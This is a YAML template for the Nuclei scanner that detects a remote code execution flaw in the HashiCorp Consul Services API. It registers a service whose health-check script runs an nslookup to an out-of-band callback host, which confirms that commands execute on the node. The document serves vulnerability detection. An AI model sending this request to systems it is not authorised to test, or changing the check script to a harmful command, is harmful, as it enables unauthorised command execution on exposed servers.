id: hashicorp-consul-rce

info:
  name: Hashicorp Consul Services API - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Hashicorp Consul Services API is vulnerable to an attack that can be leveraged to gaino remote command execution on Consul nodes.
  reference:
    - https://www.exploit-db.com/exploits/46074
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: hashicorp,rce,oast,intrusive,edb

requests:
  - raw:
      - | # Create USER
        PUT /v1/agent/service/register HTTP/1.1
        Host: {{Hostname}}

        {
          "ID": "{{randstr}}",
          "Name": "{{randstr}}",
          "Address": "127.0.0.1",
          "Port": 80,
          "check": {
            "script": "nslookup {{interactsh-url}}",
            "interval": "10s",
            "Timeout": "86400s"
          }
        }

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

# Enhanced by mp on 2022/06/01